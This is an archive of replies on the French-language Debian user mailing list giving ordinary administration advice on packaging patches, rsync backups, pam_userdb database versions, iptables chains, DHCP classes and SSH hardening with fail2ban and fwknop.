Re: Application des patches lors du packaging
Le 26/03/2013 21:16, Berillions a écrit : Bonsoir, Bonjour, Je suis en train d'empaqueter moi-même les dernières versions de Wine grâce au dossier debian crée par les mainteneurs Debian officiels. Lorsque j'ai crée les paquets pour la version 1.5.25 de Wine, j'ai du appliquer quelques patches aux sources pour mes applications. J'ai donc suivi ce qui était expliqué dans le Chap.3 du mainteneur Debian à propos de quilt : http://www.debian.org/doc/manuals/maint-guide/modify.fr.html#quiltrc Je me retrouve bien avec un dossier debian/patches avec les différents patches à l'intérieur ainsi qu'un fichier series listant les différents patches. Lorsque j'utilise les paquets wine 1.5.25, les patches fonctionnent = Normal pour créer le dossier patches j'ai appliqué les patches aux sources de Wine. Lorsque j'utilise le dossier debian avec les sources de Wine 1.5.26, je ne fais juste qu'un dch -v pour mettre à jour le changelog puis je lance le fameux dpkg-buildpackage pour construire les paquets. Le soucis que je rencontre, c'est que lorsque je lance cette commande, les patches ne sont pas appliqués automatiquement. Est-ce normal ou pas, dois-je les appliquer manuellement ? Une piste vite fait, est-ce que le format du package est en 3.0? http://wiki.debian.org/Projects/DebSrc3.0 mkdir debian/source ; echo '3.0 (quilt)' debian/source/format -- Franck Joncourt -- Lisez la FAQ de la liste avant de poser une question : http://wiki.debian.org/fr/FrenchLists Pour vous DESABONNER, envoyez un message avec comme objet unsubscribe vers debian-user-french-requ...@lists.debian.org En cas de soucis, contactez EN ANGLAIS listmas...@lists.debian.org Archive: http://lists.debian.org/51529e55.50...@debian.org
Re: Application des patches lors du packaging
Le 27/03/2013 09:43, Sébastien NOBILI a écrit : Bonjour, Le mardi 26 mars 2013 à 21:16, Berillions a écrit : Lorsque j'utilise le dossier debian avec les sources de Wine 1.5.26, je ne fais juste qu'un dch -v pour mettre à jour le changelog puis je lance le fameux dpkg-buildpackage pour construire les paquets. Le soucis que je rencontre, c'est que lorsque je lance cette commande, les patches ne sont pas appliqués automatiquement. Est-ce normal ou pas, dois-je les appliquer manuellement ? Il ne faut pas les appliquer manuellement, ce processus et entièrement automatisé. Quand tu dis que « les patches ne sont pas appliqués automatiquement. », qu'est-ce que tu veux dire exactement ? - en regardant le code source tu ne vois pas les parties patchées ? - tu ne vois pas la phase de patch dans la sortie de « dpkg-buildpackage » ? Est-tu sûr que les patches 1.5.25 s'appliquent bien à la 1.5.26 (tu peux le vérifier en lançant la commande « patch » à la main) ? Le plus simple c'est tout de même de configurer quilt et ensuite de les appliquer avec quilt push et ensuite de les enlever avec quilt pop. Si cela fonctionne bien, le build se fera aussi bien sans aucun hunk. Si eznsuite le format du package est de type 3.0 quilt l'application des patchs se fera toute seule. -- Franck Joncourt -- Lisez la FAQ de la liste avant de poser une question : http://wiki.debian.org/fr/FrenchLists Pour vous DESABONNER, envoyez un message avec comme objet unsubscribe vers debian-user-french-requ...@lists.debian.org En cas de soucis, contactez EN ANGLAIS listmas...@lists.debian.org Archive: http://lists.debian.org/5152b358.90...@debian.org
Re: Petit script
Le 30/05/2012 13:23, Nahliel Steinberg a écrit : bonjour, bonjour, Je cherche le moyen de relancer un service automatiquement quand il tombe, pour qu'il soit relancé automatiquement. Tu peux aussi regarder du côté du package monit je pense. -- Franck -- Lisez la FAQ de la liste avant de poser une question : http://wiki.debian.org/fr/FrenchLists Pour vous DESABONNER, envoyez un message avec comme objet unsubscribe vers debian-user-french-requ...@lists.debian.org En cas de soucis, contactez EN ANGLAIS listmas...@lists.debian.org Archive: http://lists.debian.org/4fc75fe7.1020...@debian.org
Re: Installation connexion réseau ethernet entre 2 batiments espacé de 150m
Bonjour, Le 25/11/2011 15:32, Thierry Despeyroux a écrit : [...] il est possible de faire du cpl en triphasé sans soucis mais le prix est dissuasif ... sauf si on est un tout petit peu bricoleur, j'ai vu un montage, pour quelques euros chez conrad on se fait un pont vendu une centaine d'euro quand c'est tout fait ... 5qques condensateurs... ! Il faut tout de même s'assurer qu'il n'y a pas de compteurs entre les deux sites, ou que d'autres systèmes CPL n'atténueraient pas le signal pour au final se rendre compte que cela ne fonctionne pas. -- Franck Joncourt -- Lisez la FAQ de la liste avant de poser une question : http://wiki.debian.org/fr/FrenchLists Pour vous DESABONNER, envoyez un message avec comme objet unsubscribe vers debian-user-french-requ...@lists.debian.org En cas de soucis, contactez EN ANGLAIS listmas...@lists.debian.org Archive: http://lists.debian.org/4ecfba3c.8030...@dthconnex.com
Re: attaque par force brute
Bonjour, On Fri, Sep 24, 2010 at 11:01:25PM +0200, s4...@free.fr wrote: pour se protéger de ce genre d'attaque il y a fail2ban qui est assez efficace et qui laisse des logs très clair. Fwknop est plus adapté je pense, car l'accès SSH est dévérouillé sur authentification auprès du serveur fwknop. -- Franck Joncourt -- Lisez la FAQ de la liste avant de poser une question : http://wiki.debian.org/fr/FrenchLists Pour vous DESABONNER, envoyez un message avec comme objet unsubscribe vers debian-user-french-requ...@lists.debian.org En cas de soucis, contactez EN ANGLAIS listmas...@lists.debian.org Archive: http://lists.debian.org/20100925073735.ga2...@diamond.stones.lan
Re: Pour que le son sorte d'un autre PC...
On Wed, Jan 20, 2010 at 11:29:54PM +0100, Pierre Allken-Bernard wrote: Le 20/01/2010 à 23:26:36, Jean-Yves F. Barbier a écrit : Franck Joncourt a écrit : ... Tu devrais aussi pouvoir le faire en redirigeant /dev/dsp, et en utilisant netcat sur les deux machines, l'une en écoute, l'autre en transmission. A essayer je pense. wai, parce que pulseaudio en stable, c'est la misère Oui, j'ai désinstallé pulseaudio, je ne sais plus pourquoi mais je sais qu'il y avait une raison. Par contre, /dev/dsp et netcat c'est abstrait pour moi. J'ai essayé nc en lisant les exemples de la doc et j'en suis à avoir deux terminaux, un sur chaque PC, synchronisés (ce qu'on entre sur l'un s'affiche sur l'autre). Quelqu'un a le courage de m'expliquer lentement ? Je n'ai pas trop le temps de vérifier mais tu peux essayer quelque chose comme cela: http://www.linuxforums.org/articles/having-fun-with-netcat-_268.html -- Franck Joncourt signature.asc Description: Digital signature
Re: Pour que le son sorte d'un autre PC...
Bonsoir, On Wed, Jan 20, 2010 at 10:26:40PM +0100, Pierre Allken-Bernard wrote: Le 20/01/2010 à 22:08:46, Goldy a écrit : On 20/01/2010 21:53, Pierre Allken-Bernard wrote: Quand je regarde une vidéo sur mon PC portable à la maison, j'aimerais, à l'occasion, que le son sorte d'enceintes qui dépendent d'un autre PC (en réseau avec le premier). C'est possible ? C'est facile ? (j'imagine que ça fait pas mal d'informations à passer par le réseau (?)) Merci d'avance. Avec pulseaudio, c'est tout à fait réalisable et pas vraiment compliqué à mettre en place. Merci, je vais m'instruire là dessus ! Tu devrais aussi pouvoir le faire en redirigeant /dev/dsp, et en utilisant netcat sur les deux machines, l'une en écoute, l'autre en transmission. A essayer je pense. -- Franck Joncourt signature.asc Description: Digital signature
Re: Compilation de paquet 3 2/64bits et dépôt personnel
On Wed, Jan 13, 2010 at 08:39:06PM +0100, Vincent MAUGE wrote: Bonjour, Bonsoir, Je viens d'avoir ma réponse sur le chan debian-devel-fr. Pour la deuxième compilation il faut utilisé l'option --binary-arch pour n'avoir dans le .changes uniquement ce qui concerne le .deb En espérant que ça aide d'autre personne, Je suis passé à côté de ton mail on dirait. Je suis content que la mise en oeuvre de mon référentiel t'ait aidé :) -- Franck Joncourt signature.asc Description: Digital signature
Re: [HS] Salon RBLL2010
On Sun, Dec 20, 2009 at 01:02:40AM +0100, Kevin Hinault wrote: Bonjour à tous, Bonjour, J'aide à organiser les Rencontres Bretonnes du Logiciel Libre en Avril pour l'association Breizhtux. A cet effet, je souhaite proposer aux acteurs du Libre de participer autant pour présenter un stand que pour présenter des conférences sur les sujets qu'ils souhaitent. Est ce que des Debianistes (développeurs, mainteneurs, etc) seraient partant ? D'ailleurs est ce que je suis sur la bonne mailing-list pour ça ? Sinon corrigez moi :) Tu peux tenter devel-french si tu veux cibler un peu plus les DDs et DMs. Les RBLL cette année auront lieu à Rennes plutôt qu'à St Brieuc, les détails viendront un peu plus tard mais nous ouvrons la possibilité à tous ceux qui serait intéressés de réserver un stand. Donc voilà, n'hésitez pas à me poser des questions où à me contacter. Je prends note :) [...] -- Franck Joncourt signature.asc Description: Digital signature
Re: vsftp problème
Bonjour, Courrier Debian a écrit : [...] Merci pour l'info elle m'a été très utile, mais je me heurte à un problème surprenant. 1 je crèe la base login.db avec db3_load. 2 je lis correctement cette base avec db3_dump 3 j'essaie de me connecter aux base vsftp par l'intermédiaire du, module pam_userdb qui se sert de la base login.db pour autoriser la connexion, rejet avec les messages : vsftpd: pam_userdb (vfstpd:auth) : Verify user 'xx' with a password vsftpd: pam_userdb (vfstpd:auth) : password in database is [(nil)]',len is 0 vsftpd: pam_userdb (vfstpd:auth) : error returned by dbm_fetch : no such file vsftpd: pam_userdb (vfstpd:auth) : user 'xx' not found in database 4 j'essaie de relire la base login.db avec db3_dump et là j'ai une erreur en lecture, j'ai essayé de mettre la base en lecture seule même résultat !!! Es ce que quelqu'un peut me donner une idée pour m'en sortir ? es ce que pam_userdb lit les bases db3 ou db4 ? Merci pour tout aide. Philippe fra...@pluton:~$ ldd /lib/security/pam_userdb.so linux-vdso.so.1 = (0x7fffeb5fe000) libpam.so.0 = /lib/libpam.so.0 (0x2b6ebf85) libdb-4.6.so = /usr/lib/libdb-4.6.so (0x2b6ebfa5b000) libcrypt.so.1 = /lib/libcrypt.so.1 (0x2b6ebfda6000) libc.so.6 = /lib/libc.so.6 (0x2b6ebffde000) libdl.so.2 = /lib/libdl.so.2 (0x2b6ec0331000) libpthread.so.0 = /lib/libpthread.so.0 (0x2b6ec0536000) /lib64/ld-linux-x86-64.so.2 (0x4000) Donc à priori, dans mon cas elle serait liée à la version 4.6. Et j'utiliserais les outils présents dans le paquet db4.6-utils pour manipuler la base. A voire si cela t'aide. -- Franck Joncourt -- Lisez la FAQ de la liste avant de poser une question : http://wiki.debian.org/fr/FrenchLists Vous pouvez aussi ajouter le mot ``spam'' dans vos champs From et Reply-To: Pour vous DESABONNER, envoyez un message avec comme objet unsubscribe vers debian-user-french-requ...@lists.debian.org En cas de soucis, contactez EN ANGLAIS listmas...@lists.debian.org
Re: vsftp problème
Courrier Debian a écrit : [...] Oui cela m'aide un peu et cela confirme le bug #521860 Avril 2009 intitulé: libpam-modules: libdb upgrade silently breaks pam_userdb.so Ou il décrit ce que je subis actuellement, le coupable est libdb-4.7.so qui n'arrive pas à lire les bases de données créées par db3_load et cerise sur le gâteau vérole la base de donnée. Dans ce signalement de bug il y a une discussion avec beaucoup d'échange cela se termine par transmission du bébé à Oracle avec un lien, là encore quelques échanges d'informations tout cela en Avril 2009 puis plus rien depuis sauf un rappel du pb non résolu 30 Mai 2009 par le mainteneur Debian. Ceci est inquiétant et à l'heure ou Oracle absorbe mysql cela promet des beaux jours !!! Revenons à mon problème, je suis en version squeeze et donc impacté, puis je rétrogradé en libdb-4.6.0 sans pb? J'ai lu rapidement, mais la recréation de la base avec les outils de la 4.7 devraient résoudre ton problème (c'est le plus simple à mon avis). Par contre, pour la récupérer, je n'ai pas d'idées sur le moment. Après, il faut voire le temps que tu veux passer sur le problème :) Eventuellement, tu pourrais migrer sous Mysql ou LDAP. -- Franck Joncourt -- Lisez la FAQ de la liste avant de poser une question : http://wiki.debian.org/fr/FrenchLists Vous pouvez aussi ajouter le mot ``spam'' dans vos champs From et Reply-To: Pour vous DESABONNER, envoyez un message avec comme objet unsubscribe vers debian-user-french-requ...@lists.debian.org En cas de soucis, contactez EN ANGLAIS listmas...@lists.debian.org
Re: vsftp problème
Courrier Debian a écrit : [...] En effet passer en 4.7 cela semblerait la solution la plus normale ?!? Oui mais, !!! J'ai créé une nouvelle base login.db avec db_load puis essayé de me connecter à vsftp ,réponse de pam_userdb il n'arrive pas à ouvrir la base login.db un dump de celle ci avec db_dump indique que la base est correct. Juste pour confirmation, c'est bien db4.7_load, db4.7_dump ... que tu utilises? As tu essayé db4.7_verify pour voire? Quel est le message exact du module PAM? Je tourne en rond, pour mémoire la base login.db contient les utilisateurs autorisés et leur mot de passe à se connecter à vsftp, si je ne résous pas ce problème vsftp chez moi ne fonctionnera pas, donc c'est crucial. Malheureusement, je ne pense pas avoir le temps de tester une quelconque configuration ce week-end. J'essaierais tout de même, mais je ne garantis rien. Tout ce que je peux faire pour le moment c'est te faire pointer vers une de mes anciennes configuration: http://dthconnex.com/ftp_server.html au cas où cela soit un simple problème de config. -- Franck Joncourt -- Lisez la FAQ de la liste avant de poser une question : http://wiki.debian.org/fr/FrenchLists Vous pouvez aussi ajouter le mot ``spam'' dans vos champs From et Reply-To: Pour vous DESABONNER, envoyez un message avec comme objet unsubscribe vers debian-user-french-requ...@lists.debian.org En cas de soucis, contactez EN ANGLAIS listmas...@lists.debian.org
Re: analyser un kernelpanic
georges a écrit : Bonjour, Bonjour, Suite à des kernelpanic intempestif, je suspecte un probléme hardware ou un bug dans un module. Quel moyen à t'on pour analyser un kernepanic et trouver l'origine? Je n'ai jamais utilisé, mais regarde un peu par là: http://en.wikipedia.org/wiki/Magic_SysRq_key --- Franck Joncourt -- Lisez la FAQ de la liste avant de poser une question : http://wiki.debian.org/DebFrFrenchLists Vous pouvez aussi ajouter le mot ``spam'' dans vos champs From et Reply-To: To UNSUBSCRIBE, email to debian-user-french-requ...@lists.debian.org with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org
Re: Problème avec un paquet
echo -e '#!/bin/sh\nexit 0' /var/lib/dpkg/info/spamass-milter.postinst Regarder ce qui pose problème avec le script du mainteneur, et envoyer un rapport de bogue serait peut être plus intéressant :) -- Franck Joncourt http://debian.org - http://smhteam.info/wiki/ signature.asc Description: OpenPGP digital signature
Re: sauvegarde avec id user différent
Grégory Bulot a écrit : Grégory Bulot [EMAIL PROTECTED] à écrit le Fri, 5 Dec 2008 08:45:32 +0100 ignore nonreadable = yes en passant à yes Oui, je l'avais vu mais je voulais tester avant de répondre. rsync: readlink [...] (in public) failed: Permission denied (13) sur pas mal de fichiers et répertoires (justement ceux que je ne vois pas sur le client !) pour le demon est lancé root côté client en root aussi ! j'ai un peu de tout pour les droits (certains répertoire sont limité en accès à certains groupes), y'a pas une option qui permet de passer quand même ? (c'est la première fois, que rsync me fait ça) Modifies l'uid et le gid de ta configuration rsyncd en root:root et non plus en nobody et nogroup je crois. Moi je n'ai pas ce problème de droits car toutes mes sauvegardes sont splittées, et j'adapte les uid et gid de rsyncd en fonction de celles-ci. Cela me permet ainsi d'adapter les périodes de rollover des sauvegardes pour chaque module en fonction des besoins. --- Franck -- Lisez la FAQ de la liste avant de poser une question : http://wiki.debian.org/DebFrFrenchLists Vous pouvez aussi ajouter le mot ``spam'' dans vos champs From et Reply-To: To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]
Re: sauvegarde avec id user différent
Salut, côté client : rsync -avvcrz smith::public /home/public (idem avec -W) j'ai encore des répertoires non synchronisé ! Peut tu fournir la configuration serveur que tu utilises pour faire la manipulation ? Tu fais la sauvegarde en manuelle pour le moment ou bien tu utilises lbm4r ? Qu'entends tu par non synchronisés ? La création de l'archive la première fois, ou bien la mise à jour de ta copie ; suppression de fichiers non répercutée ou modifications non répercutées ? Tu vois le problème via la sortie de rsync ? -- Franck Joncourt http://debian.org - http://smhteam.info/wiki/ Fingerprint : C10E D1D0 EF70 0A2A CACF 9A3C C490 534E 75C0 89FE signature.asc Description: OpenPGP digital signature
Re: sauvegarde avec id user différent
Salut, dans un environnement 100% debian, je souhaiterais sauvegarder le /home d'un (plusieurs) pc utilisateur vers /home du serveur forcément les id user ne sont pas identiques entre pc et serveur. rsync (en root ou user du pc) me renvois en pagaille du : - rsync: recv_generator: failed to stat ...: Permission denied (13) - rsync: chown ... failed: Operation not permitted (1) cela m'ennuis d'utiliser cifs (qui ne gère pas les id il me semble, mais le nom d'utilisateur comme correspondance ... j'suis sur non plus) vous faites comment dans un cas comme le miens ? Guillaume Caron wrote: C'est peut-etre l'occasion d'uniformiser tes uids ? Parce qu'à part ça, je ne vois pas de solution simple... Peut-etre qu'il y aurait moyen avec une solution du style OpenVZ, en assignant un environnement par utilisateur, mais ça devient usine à gaz... Installer rsyncd sur les machines à sauvegarder, en définissant les modules et les droits à affecter. Ensuite utiliser rsync depuis ton serveur de sauvegarde pour rapatrier tous les modules. Une petite tache cron, un petit script de gestion des modules et de la sauvegarde incrémentale, et le tout fonctionne très bien. -- Franck Joncourt http://debian.org - http://smhteam.info/wiki/ Fingerprint : C10E D1D0 EF70 0A2A CACF 9A3C C490 534E 75C0 89FE signature.asc Description: OpenPGP digital signature
Re: [HS] Attaque dictionnaire distribuée sur se rveur ssh.
Salut, apt-get install fwknop-server apt-get install fwknop-client et la question des logs ne se pose plus. Il y a même un client windows. -- Franck Joncourt http://debian.org - http://smhteam.info/wiki/ Fingerprint : C10E D1D0 EF70 0A2A CACF 9A3C C490 534E 75C0 89FE signature.asc Description: OpenPGP digital signature
Re: sauvegarde avec id user différent
Grégory Bulot wrote: Grégory Bulot [EMAIL PROTECTED] à écrit le Sun, 30 Nov 2008 11:39:43 +0100 Franck Joncourt [EMAIL PROTECTED] à écrit le Sun, 30 Nov 2008 11:32:11 +0100 Installer rsyncd sur les machines à sauvegarder, en définissant les modules et les droits à affecter. Ensuite utiliser rsync depuis ton serveur de sauvegarde pour rapatrier tous les modules. effectivement, rien que le nom me plait (pourquoi j'y ais pas pensé avant ?) je termine de tester fuse/sshfs avec rsync, si c'est trop long, je tente rsyncd bon sshfs fige matériellement la machine (bug fuse ?), je suis passé à rsyncd, cela semble plus efficace et rapide (j'ai 14Go a sauvegarder, cela prend un peu de temps ... la 1ere fois ;-) ) bon forcement cela se base sur le uid:gid donc a la place d'un utilisateur j'ai du 500, 501, ... au lieu de toto, titi, ... on va dire que dans un 1er temps, c'est déjà beaucoup ! Bon et bien maintenant tu peux ajouter: deb http://dthrepo.podzone.org/debian/ sid main à ton sources.list, et installer lbm4r Ensuite tu édites ton fichier lbm4r.conf pour y ajouter la configuration de tes modules. Voici un exemple: [diamond.stones.lan] comment = thialmes projects enable = yes path = /mnt/rack_m200/backup/ # chemin du répertoire de backup address = diamond.stones.lan # nom de ton serveur à sauvegarder module = projects # nom du module rsync distant days = 15 # nombre de jours pour le rolling hours = 2 # delais minimum entre les sauvegardes Il ne reste plus qu'à lancer lbm4r via la crontab ou manuellement. Le paquet actuel traite le module et le path en minuscule. J'ai corrigé le problème mais je n'ai pas réempaqueter le tout. par contre c'est surprenant : - le refus du mode 'test' - la syntaxe du répertoire 'partagé rsync', cela peux prêter à confusion avec un chemin relatif, gare à la dénomination dans rsyncd.conf ! rsync -avrzn smith::public /home/public receiving file list ... rsync: The server is configured to refuse --dry-run (-n) Je n'ai pas fait le test chez moi, mais tu n'aurais pas l'option: refuse options = dry-run dans ton fichier de conf ? (man page) -- Franck Joncourt http://debian.org - http://smhteam.info/wiki/ Fingerprint : C10E D1D0 EF70 0A2A CACF 9A3C C490 534E 75C0 89FE signature.asc Description: OpenPGP digital signature
Re: [HS] Attaque dictionnaire distribuée sur se rveur ssh.
François Cerbelle wrote: Franck Joncourt a écrit : Salut, apt-get install fwknop-server apt-get install fwknop-client et la question des logs ne se pose plus. Il y a même un client windows. Peut-etre mais où ??? J'ai évité de poster des liens cette fois-ci car je l'avais déjà mentionné sur la liste mais je n'avais jamais eu de retour. Disponible en unstable: http://packages.qa.debian.org/f/fwknop.html Ou en backport dans mon dépôt pour Etch: http://www.cipherdyne.org/blog/2008/08/installing-fwknop-on-debian-and-ubuntu.html Et pour ce qui veulent suivre les évolutions au fur et à mesure, il est aussi disponible en Sid dans mon dépôt. -- Franck Joncourt http://debian.org - http://smhteam.info/wiki/ Fingerprint : C10E D1D0 EF70 0A2A CACF 9A3C C490 534E 75C0 89FE signature.asc Description: OpenPGP digital signature
Re: sauvegarde avec id user différent
Grégory Bulot wrote: Grégory Bulot [EMAIL PROTECTED] à écrit le Sun, 30 Nov 2008 16:57:04 +0100 J'espère que cela sera mieux pour ça : rsync -avvcrz smith::public /home/public 1rsync.log 21 non, j'ai toujours des fichiers qui ne sont pas synchronisés ! - pas de messages d'erreurs - pour 1 des répertoire j'ai constaté que seul 2 fichiers étaient pris en compte '[fichier] is uptodate' mais que les ~60 autres : rien, comme si, ils n'existaient sur à la source (par contre ils sont tous en majuscule . pour ce répertoire là) J'utilise les options suivante: rsync -vrlptgoW --numeric-ids --delete ... et une configuration rsyncd similaire à la suivante: [projects] comment = thialmes projects path = /home/thialme/projects uid = thialme gid = thialme use chroot = no read only = yes list = yes hosts allow = 192.168.0.1 hosts deny = 192.168.0.0/24 192.168.1.0/24 Pour chaque module je modifie l'uid et le gid au mieux. Pour ce qui est du log tu peut faire en sorte que rsyncd mette tout dans un même fichier en utilisant l'option log file. Tu auras plus d'infos côté rsyncd que rsync :) tout du moins il me semble. -- Franck Joncourt http://debian.org - http://smhteam.info/wiki/ Fingerprint : C10E D1D0 EF70 0A2A CACF 9A3C C490 534E 75C0 89FE signature.asc Description: OpenPGP digital signature
Re: Creation automatique du home utilisateur
Anthony wrote: bonjour, je me retrouve avec un petit problème de creation automatique des homes utilisateur. [...] Quelqu'un aurait il une autre idée Tu peux peut-être regarder par là: http://tldp.org/HOWTO/Autodir-HOWTO/index.html -- Franck Joncourt http://debian.org - http://smhteam.info/wiki/ Fingerprint : C10E D1D0 EF70 0A2A CACF 9A3C C490 534E 75C0 89FE signature.asc Description: OpenPGP digital signature
MIB browser
Salut, Si certains d'entre vous ont déjà travaillé sur des MIBs, j'aurais aimé savoir ce que vous utilisiez pour les parcourir. Pour l'instant j'ai noté mbrowse et tkmib, en connaitriez vous d'autres ? Merci. -- Franck Joncourt http://debian.org - http://smhteam.info/wiki/ Fingerprint : C10E D1D0 EF70 0A2A CACF 9A3C C490 534E 75C0 89FE signature.asc Description: OpenPGP digital signature
Re: session graphique limité pour certain utilisateur
[EMAIL PROTECTED] wrote: Bonjour, Salut, Je cherche des outils dédié pour surveillé sur un PC l'utilisation de certaine session graphique selon une duré paramétré d'une dizaine de minute à 1 heure ( par ex.) le système est basé sur Debian Etch Gnome avec interface graphique déportée sur 4 postes terminaux Je pense à des fichiers script ( bash ) et à la commande ps et une crontab Il y a-t il une autre piste ? Regardes du côté de timelimit/timeout/timeoutd. Il y a aussi le module pam_time pour limiter les heures d'accès, bien que vu la description que tu donnes je ne pense pas que son utilisation convienne. -- Franck Joncourt http://debian.org - http://smhteam.info/wiki/ Fingerprint : C10E D1D0 EF70 0A2A CACF 9A3C C490 534E 75C0 89FE signature.asc Description: OpenPGP digital signature
Re: [HS] iptable comment insérer une règle?
mouss wrote: Gaëtan PERRIER a écrit : C'est ce que je fais par défaut mais là je voulais ajouter dynamiquement des règles en fonction de l'apparition de connections vpn par ex. mais finalement je me dis que ce n'est peut-être pas problématique de les ajouter en premier avec un iptables -I ? La méthode usuelle est de créer une chaîne et d'insérer les règles dynamiques dans cette chaîne. si l'anglais ne te fait pas peur, tu peux jeter un coup d'oeil sur: http://dave.thehorners.com/tech-talk/unix-linux-bsd-osx-etc/76-information-about-the-linuxunix-os-and-friends/86-iptables-a-real-mans-firewall Voila ce que cela donne chez moi :p! [code] # ifup eth3 Chargement du fichier : fw_config.sh dthfw v0.2 Chargement du fichier : fw_modules.sh Chargement du fichier : fw_proc.sh Chargement du fichier : fw_rules.sh Chargement du fichier : eth3.sh [+] Loading iptables rules for eth3 interface ... Done. # iptables -L -v | grep eth3 0 0 eth3_in_new all -- eth3 any anywhere anywhere 17 3006 eth3_out_new all -- anyeth3anywhere anywhere Chain eth3_in_new (1 references) Chain eth3_out_new (1 references) # ifdown eth3 Chargement du fichier : fw_config.sh dthfw v0.2 Chargement du fichier : fw_modules.sh Chargement du fichier : fw_proc.sh Chargement du fichier : fw_rules.sh Chargement du fichier : eth3.sh [+] Unloading rules for eth3 interface ... Done. # iptables -L -v | grep eth3 [/code] Avec un simple script bash présent dans: - /etc/network/if-pre-up.d/ - /etc/network/if-post-down.d Un petit exemple: [code] #!/bin/bash DTHFW=dthfw if [ $MODE = start ]; then MODE=load else MODE=unload fi invoke-rc.d $DTHFW $MODE $IFACE exit 0 [/code] Ensuite, c'est le script firewall qui prend le relais et fait les vérifications d'usage: - firewall démarré, - recherche des règles associées à l'interface ... Aujourd'hui j'ai un fichier de règles par interface. Chaque fichier est renseigné de la même façon: [code] #!/bin/sh METHOD=$1 IFACE=$2 IPTABLES='/sbin/iptables' IN_CHAIN=$IFACE'_in_new' OUT_CHAIN=$IFACE'_out_new' = # Unload iptables rules for this specific interface # # This function removes all specific rules linked to this interface. # Therefore, the user defined chains are unlinked from the dynamic # chain, then flushed and by the end removed # # syntax : unload # # return : nothing unload () { $IPTABLES -D dyn_in_new -i $IFACE -j $IN_CHAIN $IPTABLES -F $IN_CHAIN $IPTABLES -X $IN_CHAIN $IPTABLES -D dyn_out_new -o $IFACE -j $OUT_CHAIN $IPTABLES -F $OUT_CHAIN $IPTABLES -X $OUT_CHAIN } # = # Load iptables rules for this specific interface # # This function adds all specific rules linked to this interface. # Therefore, the user defined chains are created and linked to the # dynamic chains, then the ruleset is applied # # syntax : load # # return : nothing load () { ... } [/code] On remarquera les chaines utilisateurs dyn_in_new et dyn_out_new dans lesquelles sont ajoutées une chaine utilisateur par interface. L'avantage est grand, car: - Le firewall n'est jamais redémarré à moins d'une modification de la politique par défaut. - Chaque ruleset associé à une interface peut-être chargé/déchargé de façon simple. - Une mise à jour de mon ruleset pour mon interface de test peut échouer sans impacter tout le firewall et verrouiller ainsi tous les accès. - Toutes les interfaces bénéficient de la politique par défaut bien qu'ajouter plus tard. -- Franck Joncourt http://debian.org - http://smhteam.info/wiki/ Fingerprint : C10E D1D0 EF70 0A2A CACF 9A3C C490 534E 75C0 89FE signature.asc Description: OpenPGP digital signature
Re: dhcpd.conf: plusieurs gateway sur le meme subnet
Bonjour, j'ai un lan avec un subnet précis, avec 2 liaisons wan. pour des raisons d'optimisation de bande passante, je voudrais annoncer des gateway différents en fonction des mac adresses des clients, sur le MEME subnet. Ces possible. La solution consiste à utiliser le mot clé group. utiliser des options communes pour ce groupe et déclarer toutes les adresses mac des clients. Quelque chose de similaire serait l'utilisation des class et pool dans le même subnet. Exemple: [quote=dhcpd.conf] class level_1 { match if substring (option dhcp-client-identifier,0,5) = LAN_1; } class level_2 { match if substring (option dhcp-client-identifier,0,5) = LAN_2; } subnet 192.168.0.0 netmask 255.255.255.0 { [...] pool { deny members of level_1; deny members of level_2; [...] } pool { allow members of level_1; deny members of level_2; [...] } pool { deny members of level_1; allow members of level_2; [...] } [...] [/quote] Cela devrait aussi fonctionner je pense. Après il faut trouver la meilleure façon de répartir les postes dans les classes. -- Franck Joncourt http://debian.org - http://smhteam.info/wiki/ Fingerprint : C10E D1D0 EF70 0A2A CACF 9A3C C490 534E 75C0 89FE signature.asc Description: OpenPGP digital signature
Re: [HS] iptable comment insérer une règle?
Salut, Gaëtan PERRIER wrote: Oui mais le problème c'est qu'avec cette commande ce n'est pas évident d'insérer juste avant la dernière règle, non? -I permet de spécifier l'emplacement de la règle dans une chaîne donnée. Tu peux t-aider de l'argument --line-numbers pour définir l'emplacement de ta nouvelle règle. Par contre si tu veux le faire avec un script, regarde du côté des modules perl libiptables-parse-perl et libiptables-chainmgr-perl. Les pages de manuelle associées mettent en évidence les différentes fonctions disponibles. Ces modules sont à ce jour uniquement présents en Lenny, et en Sid depuis les dépôts officiels. -- Franck Joncourt http://debian.org - http://smhteam.info/wiki/ Fingerprint : C10E D1D0 EF70 0A2A CACF 9A3C C490 534E 75C0 89FE signature.asc Description: OpenPGP digital signature
Re: Bloquer les tentatives connexion ssh
Salut, François Boisson wrote: Le Wed, 1 Oct 2008 15:21:17 +0200 steve [EMAIL PROTECTED] a écrit: Mais ici il ne s'agit pas vraiment de sécurité mais juste de réduire les nuisances dues à ces essais sur un port classique. Mais fail2ban fait très bien son travail. À une remarque près, j'utilise ipt_recent et un script faisant à peu près la même chose mais je fais face à des tentatives venant de 2000 machines différentes coordonnées entre elles: [...] je ne sais pas comment contourner ça mis à part l'écoute sur un autre port... Utilises fwknop. C'est en anglais: http://www.cipherdyne.org/fwknop/ Pour faire simple: En considérant que ton firewall bloque le port 22, le démon fwknop est à l'écoute pour des demandes d'accès au serveur SSH. Un client est disponible pour permettre l'envoie de paquets cryptés vers le serveur. Une fois que le client est identifé il te donne accès à ton serveur SSH (nouvelles connexions) pendant un timeout, avant de le verrouiller à nouveau. On peut l'appliquer pour tous ports et même l'appliquer pour du forward de connexion, gérer les blacklists, exécuter des commandes à distance... Si cela te tente je te fournirais un lien pour une installation facile et rapide. -- Franck Joncourt http://debian.org - http://smhteam.info/wiki/ Fingerprint : C10E D1D0 EF70 0A2A CACF 9A3C C490 534E 75C0 89FE signature.asc Description: OpenPGP digital signature
Re: Bloquer les tentatives connexion ssh
